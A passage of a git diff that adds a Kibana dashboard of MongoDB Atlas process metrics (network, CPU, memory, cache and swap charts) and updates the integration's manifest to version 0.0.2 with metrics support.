"121fbb4f-be86-4152-ab18-855573e73fac" + ], + "columns": { + "121fbb4f-be86-4152-ab18-855573e73fac": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "bytesOut", + "operationType": "average", + "params": { + "emptyAsNull": true, + "format": { + "id": "bytes", + "params": { + "decimals": 2 + } + } + }, + "scale": "ratio", + "sourceField": "mongodb_atlas.process.network.out" + }, + "6444b274-4ebe-4898-8cef-5271e9e1ff54": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "bytesIn", + "operationType": "average", + "params": { + "emptyAsNull": true, + "format": { + "id": "bytes", + "params": 
{ + "decimals": 2 + } + } + }, + "scale": "ratio", + "sourceField": "mongodb_atlas.process.network.in" + }, + "9ea8b9a9-be57-40fd-8afd-34037f25342c": { + "dataType": "date", + "isBucketed": true, + "label": "@timestamp", + "operationType": "date_histogram", + "params": { + "dropPartials": false, + "includeEmptyRows": true, + "interval": "auto" + }, + "scale": "interval", + "sourceField": "@timestamp" + } + }, + "incompleteColumns": {}, + "sampling": 1 + } + } + }, + "indexpattern": { + "layers": {} + }, + "textBased": { + "layers": {} + } + }, + "filters": [], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "axisTitlesVisibilitySettings": { + "x": true, + "yLeft": false, + "yRight": true + }, + "curveType": "LINEAR", + "emphasizeFitting": true, + "fittingFunction": "Linear", + "gridlinesVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "labelsOrientation": { + "x": 0, + "yLeft": 0, + "yRight": 0 + }, + "layers": [ + { + "accessors": [ + "6444b274-4ebe-4898-8cef-5271e9e1ff54", + "121fbb4f-be86-4152-ab18-855573e73fac" + ], + "layerId": "4bae4135-aa8b-47ba-bbd7-6a22b4b3697c", + "layerType": "data", + "position": "top", + "seriesType": "line", + "showGridlines": false, + "xAccessor": "9ea8b9a9-be57-40fd-8afd-34037f25342c" + } + ], + "legend": { + "isVisible": true, + "legendSize": "large", + "position": "right", + "showSingleSeries": true + }, + "preferredSeriesType": "line", + "tickLabelsVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "valueLabels": "hide", + "valuesInLegend": true, + "yTitle": "Average" + } + }, + "title": "", + "type": "lens", + "visualizationType": "lnsXY" + }, + "enhancements": {}, + "hidePanelTitles": false + }, + "gridData": { + "h": 9, + "i": "0ee6e613-07de-475e-b46c-4b10669be400", + "w": 16, + "x": 32, + "y": 9 + }, + "panelIndex": "0ee6e613-07de-475e-b46c-4b10669be400", + "title": "Network throughput over time [Metrics MongoDB 
Atlas]", + "type": "lens" + }, + { + "embeddableConfig": { + "attributes": { + "description": "", + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-072715a7-2316-42ca-9272-7bac814074e3", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "072715a7-2316-42ca-9272-7bac814074e3": { + "columnOrder": [ + "98bd06e3-8c06-4e53-9f14-3b32d7c0da97", + "612322a5-f707-4b2f-bc3e-7237dc475e59", + "1e21a64b-d369-4b4a-a32d-5647705b5fea", + "c1dfcc14-1fc9-430e-8ef0-ac848e07e145", + "7e266a96-97bf-464e-8f89-ffb06fe28ae8" + ], + "columns": { + "1e21a64b-d369-4b4a-a32d-5647705b5fea": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "\"mongodb_atlas.process.cpu.normalized.children.kernel.pct\": *" + }, + "isBucketed": false, + "label": "normalized kernel", + "operationType": "last_value", + "params": { + "sortField": "@timestamp" + }, + "scale": "ratio", + "sourceField": "mongodb_atlas.process.cpu.normalized.children.kernel.pct" + }, + "612322a5-f707-4b2f-bc3e-7237dc475e59": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "\"mongodb_atlas.process.cpu.children.kernel.pct\": *" + }, + "isBucketed": false, + "label": "kernel", + "operationType": "last_value", + "params": { + "sortField": "@timestamp" + }, + "scale": "ratio", + "sourceField": "mongodb_atlas.process.cpu.children.kernel.pct" + }, + "7e266a96-97bf-464e-8f89-ffb06fe28ae8": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "\"mongodb_atlas.process.cpu.normalized.user.pct\": *" + }, + "isBucketed": false, + "label": "normalized user", + "operationType": "last_value", + "params": { + "sortField": "@timestamp" + }, + "scale": "ratio", + "sourceField": "mongodb_atlas.process.cpu.normalized.user.pct" + }, + "98bd06e3-8c06-4e53-9f14-3b32d7c0da97": { + "dataType": "date", + "isBucketed": 
true, + "label": "@timestamp", + "operationType": "date_histogram", + "params": { + "dropPartials": false, + "includeEmptyRows": true, + "interval": "auto" + }, + "scale": "interval", + "sourceField": "@timestamp" + }, + "c1dfcc14-1fc9-430e-8ef0-ac848e07e145": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "\"mongodb_atlas.process.cpu.children.user.pct\": *" + }, + "isBucketed": false, + "label": "user ", + "operationType": "last_value", + "params": { + "sortField": "@timestamp" + }, + "scale": "ratio", + "sourceField": "mongodb_atlas.process.cpu.children.user.pct" + } + }, + "incompleteColumns": {}, + "sampling": 1 + } + } + }, + "indexpattern": { + "layers": {} + }, + "textBased": { + "layers": {} + } + }, + "filters": [], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "axisTitlesVisibilitySettings": { + "x": true, + "yLeft": false, + "yRight": true + }, + "emphasizeFitting": true, + "fittingFunction": "Linear", + "gridlinesVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "labelsOrientation": { + "x": 0, + "yLeft": 0, + "yRight": 0 + }, + "layers": [ + { + "accessors": [ + "612322a5-f707-4b2f-bc3e-7237dc475e59", + "c1dfcc14-1fc9-430e-8ef0-ac848e07e145", + "7e266a96-97bf-464e-8f89-ffb06fe28ae8", + "1e21a64b-d369-4b4a-a32d-5647705b5fea" + ], + "layerId": "072715a7-2316-42ca-9272-7bac814074e3", + "layerType": "data", + "seriesType": "line", + "xAccessor": "98bd06e3-8c06-4e53-9f14-3b32d7c0da97" + } + ], + "legend": { + "isVisible": true, + "legendSize": "large", + "position": "right", + "showSingleSeries": true + }, + "preferredSeriesType": "line", + "tickLabelsVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "valueLabels": "hide", + "valuesInLegend": true, + "yTitle": "Count" + } + }, + "title": "Cpu ", + "type": "lens", + "visualizationType": "lnsXY" + }, + "enhancements": {}, + "hidePanelTitles": false 
+ }, + "gridData": { + "h": 9, + "i": "7debedbb-89c5-4585-a78e-8b891ddb5d73", + "w": 16, + "x": 0, + "y": 27 + }, + "panelIndex": "7debedbb-89c5-4585-a78e-8b891ddb5d73", + "title": "Process CPU children over time [Metrics MongoDB Atlas]", + "type": "lens" + }, + { + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-d9480e62-ff0a-47b5-b162-2374ef9a9ee0", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "d9480e62-ff0a-47b5-b162-2374ef9a9ee0": { + "columnOrder": [ + "c8b2c286-a576-4f4b-835c-8ca63597d779", + "fe6bc717-88d8-490b-861b-8d06f85654b1", + "f2af4b65-6169-44f7-8daa-930be4990d94", + "b37ba5b7-3473-49cb-894d-2b11208982c6", + "6177537b-7f30-4db1-a283-12aa94f1fc61" + ], + "columns": { + "6177537b-7f30-4db1-a283-12aa94f1fc61": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "\"mongodb_atlas.process.cpu.normalized.user.pct\": *" + }, + "isBucketed": false, + "label": "normalized user", + "operationType": "last_value", + "params": { + "sortField": "@timestamp" + }, + "scale": "ratio", + "sourceField": "mongodb_atlas.process.cpu.normalized.user.pct" + }, + "b37ba5b7-3473-49cb-894d-2b11208982c6": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "\"mongodb_atlas.process.cpu.user.pct\": *" + }, + "isBucketed": false, + "label": "user", + "operationType": "last_value", + "params": { + "sortField": "@timestamp" + }, + "scale": "ratio", + "sourceField": "mongodb_atlas.process.cpu.user.pct" + }, + "c8b2c286-a576-4f4b-835c-8ca63597d779": { + "dataType": "date", + "isBucketed": true, + "label": "@timestamp", + "operationType": "date_histogram", + "params": { + "dropPartials": false, + "includeEmptyRows": true, + "interval": "auto" + }, + "scale": "interval", + "sourceField": "@timestamp" + }, + "f2af4b65-6169-44f7-8daa-930be4990d94": 
{ + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "\"mongodb_atlas.process.cpu.normalized.kernel.pct\": *" + }, + "isBucketed": false, + "label": "normalized kernel", + "operationType": "last_value", + "params": { + "sortField": "@timestamp" + }, + "scale": "ratio", + "sourceField": "mongodb_atlas.process.cpu.normalized.kernel.pct" + }, + "fe6bc717-88d8-490b-861b-8d06f85654b1": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "\"mongodb_atlas.process.cpu.kernel.pct\": *" + }, + "isBucketed": false, + "label": "kernel", + "operationType": "last_value", + "params": { + "sortField": "@timestamp" + }, + "scale": "ratio", + "sourceField": "mongodb_atlas.process.cpu.kernel.pct" + } + }, + "incompleteColumns": {}, + "sampling": 1 + } + } + }, + "indexpattern": { + "layers": {} + }, + "textBased": { + "layers": {} + } + }, + "filters": [], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "axisTitlesVisibilitySettings": { + "x": true, + "yLeft": false, + "yRight": true + }, + "emphasizeFitting": true, + "fittingFunction": "Linear", + "gridlinesVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "labelsOrientation": { + "x": 0, + "yLeft": 0, + "yRight": 0 + }, + "layers": [ + { + "accessors": [ + "fe6bc717-88d8-490b-861b-8d06f85654b1", + "f2af4b65-6169-44f7-8daa-930be4990d94", + "6177537b-7f30-4db1-a283-12aa94f1fc61", + "b37ba5b7-3473-49cb-894d-2b11208982c6" + ], + "layerId": "d9480e62-ff0a-47b5-b162-2374ef9a9ee0", + "layerType": "data", + "position": "top", + "seriesType": "line", + "showGridlines": false, + "xAccessor": "c8b2c286-a576-4f4b-835c-8ca63597d779" + } + ], + "legend": { + "isVisible": true, + "legendSize": "large", + "position": "right", + "showSingleSeries": true + }, + "preferredSeriesType": "line", + "tickLabelsVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, 
+ "valueLabels": "hide", + "valuesInLegend": true, + "yTitle": "Count" + } + }, + "title": "", + "type": "lens", + "visualizationType": "lnsXY" + }, + "enhancements": {}, + "hidePanelTitles": false + }, + "gridData": { + "h": 9, + "i": "e1449935-a76f-46e2-ba55-9b11be523b92", + "w": 16, + "x": 16, + "y": 27 + }, + "panelIndex": "e1449935-a76f-46e2-ba55-9b11be523b92", + "title": "Process CPU over time [Metrics MongoDB Atlas]", + "type": "lens" + }, + { + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-55e0cd65-77ab-4f8e-8c15-fc729d143dc1", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "55e0cd65-77ab-4f8e-8c15-fc729d143dc1": { + "columnOrder": [ + "aff91a31-30ed-474c-80c6-0150677e5fe9", + "a1042f4d-c560-4aa6-9e4b-304f40f4761a", + "acab90b9-ff5d-489f-9aff-fc76e23a6091", + "ffc53296-5d32-4911-86b2-68bafbf4deab" + ], + "columns": { + "a1042f4d-c560-4aa6-9e4b-304f40f4761a": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "\"mongodb_atlas.process.memory.mapped.mb\": *" + }, + "isBucketed": false, + "label": "mapped", + "operationType": "last_value", + "params": { + "format": { + "id": "number", + "params": { + "decimals": 2, + "suffix": "MB" + } + }, + "sortField": "@timestamp" + }, + "scale": "ratio", + "sourceField": "mongodb_atlas.process.memory.mapped.mb" + }, + "acab90b9-ff5d-489f-9aff-fc76e23a6091": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "\"mongodb_atlas.process.memory.resident.mb\": *" + }, + "isBucketed": false, + "label": "resident", + "operationType": "last_value", + "params": { + "format": { + "id": "number", + "params": { + "decimals": 2, + "suffix": "MB" + } + }, + "sortField": "@timestamp" + }, + "scale": "ratio", + "sourceField": "mongodb_atlas.process.memory.resident.mb" + }, + 
"aff91a31-30ed-474c-80c6-0150677e5fe9": { + "dataType": "date", + "isBucketed": true, + "label": "@timestamp", + "operationType": "date_histogram", + "params": { + "dropPartials": false, + "includeEmptyRows": true, + "interval": "auto" + }, + "scale": "interval", + "sourceField": "@timestamp" + }, + "ffc53296-5d32-4911-86b2-68bafbf4deab": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "\"mongodb_atlas.process.memory.virtual.mb\": *" + }, + "isBucketed": false, + "label": "virtual", + "operationType": "last_value", + "params": { + "format": { + "id": "number", + "params": { + "decimals": 2, + "suffix": "MB" + } + }, + "sortField": "@timestamp" + }, + "scale": "ratio", + "sourceField": "mongodb_atlas.process.memory.virtual.mb" + } + }, + "incompleteColumns": {}, + "sampling": 1 + } + } + }, + "indexpattern": { + "layers": {} + }, + "textBased": { + "layers": {} + } + }, + "filters": [], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "axisTitlesVisibilitySettings": { + "x": true, + "yLeft": false, + "yRight": true + }, + "emphasizeFitting": true, + "fittingFunction": "Linear", + "gridlinesVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "labelsOrientation": { + "x": 0, + "yLeft": 0, + "yRight": 0 + }, + "layers": [ + { + "accessors": [ + "a1042f4d-c560-4aa6-9e4b-304f40f4761a", + "acab90b9-ff5d-489f-9aff-fc76e23a6091", + "ffc53296-5d32-4911-86b2-68bafbf4deab" + ], + "layerId": "55e0cd65-77ab-4f8e-8c15-fc729d143dc1", + "layerType": "data", + "seriesType": "line", + "xAccessor": "aff91a31-30ed-474c-80c6-0150677e5fe9" + } + ], + "legend": { + "isVisible": true, + "legendSize": "large", + "position": "right", + "showSingleSeries": true + }, + "preferredSeriesType": "line", + "tickLabelsVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "valueLabels": "hide", + "valuesInLegend": true + } + }, + "title": "Memory 
usage[Metrics MongoDB Atlas]", + "type": "lens", + "visualizationType": "lnsXY" + }, + "enhancements": {}, + "hidePanelTitles": false + }, + "gridData": { + "h": 9, + "i": "e2e5e19d-83ad-4179-b868-69da9f4b3f4e", + "w": 16, + "x": 32, + "y": 27 + }, + "panelIndex": "e2e5e19d-83ad-4179-b868-69da9f4b3f4e", + "title": "Memory usage over time [Metrics MongoDB Atlas]", + "type": "lens" + }, + { + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-a63e3a4f-5884-406a-b804-9462f72589c2", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "a63e3a4f-5884-406a-b804-9462f72589c2": { + "columnOrder": [ + "df567229-64c3-44f4-bb52-70bbf227a907", + "98e8d385-d8c3-44fe-bebc-a0385afa0151", + "9931accf-2758-4a94-a2d1-8147544f8972" + ], + "columns": { + "98e8d385-d8c3-44fe-bebc-a0385afa0151": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "\"mongodb_atlas.process.cache.read.bytes\": *" + }, + "isBucketed": false, + "label": "read ", + "operationType": "last_value", + "params": { + "format": { + "id": "bytes", + "params": { + "decimals": 2 + } + }, + "sortField": "@timestamp" + }, + "scale": "ratio", + "sourceField": "mongodb_atlas.process.cache.read.bytes" + }, + "9931accf-2758-4a94-a2d1-8147544f8972": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "\"mongodb_atlas.process.cache.write.bytes\": *" + }, + "isBucketed": false, + "label": "write", + "operationType": "last_value", + "params": { + "format": { + "id": "bytes", + "params": { + "decimals": 2 + } + }, + "showArrayValues": false, + "sortField": "@timestamp" + }, + "scale": "ratio", + "sourceField": "mongodb_atlas.process.cache.write.bytes" + }, + "df567229-64c3-44f4-bb52-70bbf227a907": { + "dataType": "date", + "isBucketed": true, + "label": "@timestamp", + "operationType": 
"date_histogram", + "params": { + "dropPartials": false, + "includeEmptyRows": false, + "interval": "auto" + }, + "scale": "interval", + "sourceField": "@timestamp" + } + }, + "incompleteColumns": {}, + "sampling": 1 + } + } + }, + "indexpattern": { + "layers": {} + }, + "textBased": { + "layers": {} + } + }, + "filters": [], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "axisTitlesVisibilitySettings": { + "x": true, + "yLeft": false, + "yRight": true + }, + "curveType": "LINEAR", + "emphasizeFitting": true, + "fittingFunction": "Linear", + "gridlinesVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "labelsOrientation": { + "x": 0, + "yLeft": 0, + "yRight": 0 + }, + "layers": [ + { + "accessors": [ + "98e8d385-d8c3-44fe-bebc-a0385afa0151", + "9931accf-2758-4a94-a2d1-8147544f8972" + ], + "layerId": "a63e3a4f-5884-406a-b804-9462f72589c2", + "layerType": "data", + "position": "top", + "seriesType": "line", + "showGridlines": false, + "xAccessor": "df567229-64c3-44f4-bb52-70bbf227a907", + "yConfig": [ + { + "axisMode": "auto", + "forAccessor": "9931accf-2758-4a94-a2d1-8147544f8972" + } + ] + } + ], + "legend": { + "isVisible": true, + "legendSize": "large", + "position": "right", + "showSingleSeries": true + }, + "preferredSeriesType": "line", + "tickLabelsVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "valueLabels": "hide", + "valuesInLegend": true, + "yTitle": "Count" + } + }, + "title": "", + "type": "lens", + "visualizationType": "lnsXY" + }, + "enhancements": {}, + "hidePanelTitles": false + }, + "gridData": { + "h": 9, + "i": "59d5ec89-8838-4419-a1c0-3644f7093ad0", + "w": 16, + "x": 0, + "y": 36 + }, + "panelIndex": "59d5ec89-8838-4419-a1c0-3644f7093ad0", + "title": "Cache read and write bytes over time [Metrics MongoDB Atlas]", + "type": "lens" + }, + { + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "logs-*", + "name": 
"indexpattern-datasource-layer-66e5b503-2f90-4e9c-95ad-bafe27f2ebe3", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "66e5b503-2f90-4e9c-95ad-bafe27f2ebe3": { + "columnOrder": [ + "aaf7fe8d-30c1-41ce-bced-454c0723a329", + "03dc2a9b-a11f-48d6-8bfc-7afaef9be5e3", + "6da1fe19-f219-4038-a71a-8c434b29399f" + ], + "columns": { + "03dc2a9b-a11f-48d6-8bfc-7afaef9be5e3": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "\"mongodb_atlas.process.cache.dirty.bytes\": *" + }, + "isBucketed": false, + "label": "dirty ", + "operationType": "last_value", + "params": { + "format": { + "id": "bytes", + "params": { + "decimals": 2, + "suffix": "" + } + }, + "sortField": "@timestamp" + }, + "scale": "ratio", + "sourceField": "mongodb_atlas.process.cache.dirty.bytes" + }, + "6da1fe19-f219-4038-a71a-8c434b29399f": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "\"mongodb_atlas.process.cache.used.total.bytes\": *" + }, + "isBucketed": false, + "label": "total used", + "operationType": "last_value", + "params": { + "format": { + "id": "bytes", + "params": { + "decimals": 2 + } + }, + "sortField": "@timestamp" + }, + "scale": "ratio", + "sourceField": "mongodb_atlas.process.cache.used.total.bytes" + }, + "aaf7fe8d-30c1-41ce-bced-454c0723a329": { + "dataType": "date", + "isBucketed": true, + "label": "@timestamp", + "operationType": "date_histogram", + "params": { + "dropPartials": false, + "includeEmptyRows": false, + "interval": "auto" + }, + "scale": "interval", + "sourceField": "@timestamp" + } + }, + "incompleteColumns": {}, + "sampling": 1 + } + } + }, + "indexpattern": { + "layers": {} + }, + "textBased": { + "layers": {} + } + }, + "filters": [], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "axisTitlesVisibilitySettings": { + "x": true, + 
"yLeft": false, + "yRight": true + }, + "curveType": "LINEAR", + "emphasizeFitting": true, + "fittingFunction": "Linear", + "gridlinesVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "labelsOrientation": { + "x": 0, + "yLeft": 0, + "yRight": 0 + }, + "layers": [ + { + "accessors": [ + "03dc2a9b-a11f-48d6-8bfc-7afaef9be5e3", + "6da1fe19-f219-4038-a71a-8c434b29399f" + ], + "layerId": "66e5b503-2f90-4e9c-95ad-bafe27f2ebe3", + "layerType": "data", + "seriesType": "line", + "xAccessor": "aaf7fe8d-30c1-41ce-bced-454c0723a329" + } + ], + "legend": { + "isVisible": true, + "legendSize": "large", + "position": "right", + "showSingleSeries": true + }, + "preferredSeriesType": "line", + "tickLabelsVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "valueLabels": "hide", + "valuesInLegend": true, + "yTitle": "Count" + } + }, + "title": "Cache dirty and total used bytes [Metrics MongoDB Atlas]", + "type": "lens", + "visualizationType": "lnsXY" + }, + "enhancements": {}, + "hidePanelTitles": false + }, + "gridData": { + "h": 9, + "i": "2322e519-d472-4a4f-8fa5-adba86fd8eea", + "w": 16, + "x": 16, + "y": 36 + }, + "panelIndex": "2322e519-d472-4a4f-8fa5-adba86fd8eea", + "title": "Cache dirty and total used bytes over time [Metrics MongoDB Atlas]", + "type": "lens" + }, + { + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-579dbfe1-e5b4-47bd-9bd6-c913ca79a155", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "579dbfe1-e5b4-47bd-9bd6-c913ca79a155": { + "columnOrder": [ + "46d2a977-f1d8-4f65-a286-8bb794904047", + "2eb5bea0-f4a9-421b-afb8-3fd4f28d287f", + "db47f211-add2-4aa7-b0ec-827b5bd82c95" + ], + "columns": { + "2eb5bea0-f4a9-421b-afb8-3fd4f28d287f": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": 
"\"mongodb_atlas.process.swap.usage.total.free\": *" + }, + "isBucketed": false, + "label": "free", + "operationType": "last_value", + "params": { + "format": { + "id": "bytes", + "params": { + "decimals": 2 + } + }, + "sortField": "@timestamp" + }, + "scale": "ratio", + "sourceField": "mongodb_atlas.process.swap.usage.total.free" + }, + "46d2a977-f1d8-4f65-a286-8bb794904047": { + "dataType": "date", + "isBucketed": true, + "label": "@timestamp", + "operationType": "date_histogram", + "params": { + "dropPartials": false, + "includeEmptyRows": true, + "interval": "auto" + }, + "scale": "interval", + "sourceField": "@timestamp" + }, + "db47f211-add2-4aa7-b0ec-827b5bd82c95": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "\"mongodb_atlas.process.swap.usage.total.used\": *" + }, + "isBucketed": false, + "label": "used", + "operationType": "last_value", + "params": { + "format": { + "id": "bytes", + "params": { + "decimals": 2 + } + }, + "sortField": "@timestamp" + }, + "scale": "ratio", + "sourceField": "mongodb_atlas.process.swap.usage.total.used" + } + }, + "incompleteColumns": {}, + "sampling": 1 + } + } + }, + "indexpattern": { + "layers": {} + }, + "textBased": { + "layers": {} + } + }, + "filters": [], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "axisTitlesVisibilitySettings": { + "x": true, + "yLeft": false, + "yRight": true + }, + "emphasizeFitting": true, + "fittingFunction": "Linear", + "gridlinesVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "labelsOrientation": { + "x": 0, + "yLeft": 0, + "yRight": 0 + }, + "layers": [ + { + "accessors": [ + "db47f211-add2-4aa7-b0ec-827b5bd82c95", + "2eb5bea0-f4a9-421b-afb8-3fd4f28d287f" + ], + "layerId": "579dbfe1-e5b4-47bd-9bd6-c913ca79a155", + "layerType": "data", + "position": "top", + "seriesType": "line", + "showGridlines": false, + "xAccessor": 
"46d2a977-f1d8-4f65-a286-8bb794904047" + } + ], + "legend": { + "isVisible": true, + "legendSize": "large", + "position": "right", + "showSingleSeries": true + }, + "preferredSeriesType": "line", + "tickLabelsVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "valueLabels": "hide", + "valuesInLegend": true, + "yTitle": "Count" + } + }, + "title": "", + "type": "lens", + "visualizationType": "lnsXY" + }, + "enhancements": {}, + "hidePanelTitles": false + }, + "gridData": { + "h": 9, + "i": "fbc90d78-1b6b-4650-8840-c89d287cf3ca", + "w": 16, + "x": 32, + "y": 36 + }, + "panelIndex": "fbc90d78-1b6b-4650-8840-c89d287cf3ca", + "title": "Swap space over time [Metrics MongoDB Atlas]", + "type": "lens" + } + ], + "timeRestore": false, + "title": "[Metrics MongoDB Atlas] MongoDB Process", + "version": 1 + }, + "coreMigrationVersion": "8.8.0", + "created_at": "2024-04-12T07:06:39.544Z", + "id": "mongodb_atlas-b435ef26-546b-4e56-994e-90544e208c72", + "managed": false, + "references": [ + { + "id": "logs-*", + "name": "kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "8f13f3ed-3700-4ea1-9f9a-396a1f1fe178:indexpattern-datasource-layer-cd73b358-0ca8-41b8-98a1-376efe82ebeb", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "68be7160-9c8d-46a7-9daa-ee2cf0337f45:indexpattern-datasource-layer-9cc9c8cf-8031-491d-ad68-65c9bee42961", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "25051106-745b-4ba4-a8d9-49034e1f4abb:indexpattern-datasource-layer-9e13bc03-ef64-4c17-aa85-6a64c035c2df", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "262ae11d-86af-4aa4-b53a-55dabb3bbcc2:indexpattern-datasource-layer-d632a616-b51b-4039-af6c-a764c3635443", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "20587478-8b77-4d72-ab6f-0e4781c04306:indexpattern-datasource-layer-dec2bdc9-b28b-4737-b097-4784fc539a8e", + "type": "index-pattern" + }, + { + 
"id": "logs-*", + "name": "c0fee763-07b4-4e33-9435-f5953a528bfc:indexpattern-datasource-layer-a642128d-1d1f-433c-9412-738ea3def1fb", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "d3f6c424-e228-438c-8b54-e7229f252220:indexpattern-datasource-layer-cd89a53e-75f8-4ccd-9234-05124250cc7b", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "0ee6e613-07de-475e-b46c-4b10669be400:indexpattern-datasource-layer-4bae4135-aa8b-47ba-bbd7-6a22b4b3697c", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "7debedbb-89c5-4585-a78e-8b891ddb5d73:indexpattern-datasource-layer-072715a7-2316-42ca-9272-7bac814074e3", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "e1449935-a76f-46e2-ba55-9b11be523b92:indexpattern-datasource-layer-d9480e62-ff0a-47b5-b162-2374ef9a9ee0", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "e2e5e19d-83ad-4179-b868-69da9f4b3f4e:indexpattern-datasource-layer-55e0cd65-77ab-4f8e-8c15-fc729d143dc1", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "59d5ec89-8838-4419-a1c0-3644f7093ad0:indexpattern-datasource-layer-a63e3a4f-5884-406a-b804-9462f72589c2", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "2322e519-d472-4a4f-8fa5-adba86fd8eea:indexpattern-datasource-layer-66e5b503-2f90-4e9c-95ad-bafe27f2ebe3", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "fbc90d78-1b6b-4650-8840-c89d287cf3ca:indexpattern-datasource-layer-579dbfe1-e5b4-47bd-9bd6-c913ca79a155", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "controlGroup_d0364e5c-0c5b-43bd-a3df-bcc9572f3b2c:optionsListDataView", + "type": "index-pattern" + } + ], + "type": "dashboard", + "typeMigrationVersion": "8.9.0" +} \ No newline at end of file diff --git a/packages/mongodb_atlas/manifest.yml b/packages/mongodb_atlas/manifest.yml index 2cc24dfd283..0d4cdce6d3e 100644 --- a/packages/mongodb_atlas/manifest.yml +++ b/packages/mongodb_atlas/manifest.yml 
@@ -1,10 +1,10 @@ format_version: 3.0.3 name: mongodb_atlas title: "MongoDB Atlas" -version: 0.0.1 +version: 0.0.2 source: license: "Elastic-2.0" -description: This Elastic integration collects logs from MongoDB Atlas instance. +description: This Elastic integration collects logs and metrics from MongoDB Atlas instance. type: integration categories: - cloud @@ -19,6 +19,10 @@ screenshots: title: MongoDB Atlas Mongod Audit Dashboard size: 600x600 type: image/png + - src: /img/mongodb_atlas-process-dashboard.png + title: MongoDB Atlas Process Metrics Dashboard + size: 600x600 + type: image/png icons: - src: /img/mongodb_atlas-logo.svg title: MongoDB Atlas logo @@ -26,12 +30,12 @@ icons: type: image/svg+xml policy_templates: - name: mongodb_atlas - title: MongoDB Atlas logs - description: Collect MongoDB Atlas logs. + title: MongoDB Atlas logs and metrics + description: Collect MongoDB Atlas logs and metrics. inputs: - type: cel - title: Collect MongoDB Atlas logs - description: Collect MongoDB Atlas logs via API. + title: Collect MongoDB Atlas logs and metrics + description: Collect MongoDB Atlas logs and metrics via API. vars: - name: url type: text diff --git a/packages/mysql/_dev/benchmark/rally/error-benchmark.yml 